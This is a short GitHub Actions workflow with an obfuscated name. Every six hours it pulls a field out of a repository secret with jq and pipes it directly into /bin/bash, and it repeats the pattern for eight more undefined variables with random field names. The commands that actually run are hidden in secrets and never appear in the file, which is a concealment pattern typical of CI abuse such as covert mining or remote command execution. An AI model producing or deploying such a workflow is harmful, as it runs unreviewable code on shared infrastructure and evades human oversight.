name: xueqingfeng8712
on:
  workflow_dispatch:
  schedule:
    - cron: '43 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xueqingfeng8712
        env:
          op9: ${{ secrets.op9 }}
        run: |
          echo $op9 | jq -r .cveyr9 | /bin/bash
          echo $p267 | jq -r .xai163 | /bin/bash
          echo $e70 | jq -r .kaxa70923 | /bin/bash
          echo $xkig003 | jq -r .cf104 | /bin/bash
          echo $juxqq8 | jq -r .tmuc02201 | /bin/bash
          echo $xaoqc6424 | jq -r .va9902 | /bin/bash
          echo $y3 | jq -r .kam3 | /bin/bash
          echo $kkk77 | jq -r .e27481 | /bin/bash
          echo $un29600 | jq -r .ky8301 | /bin/bash

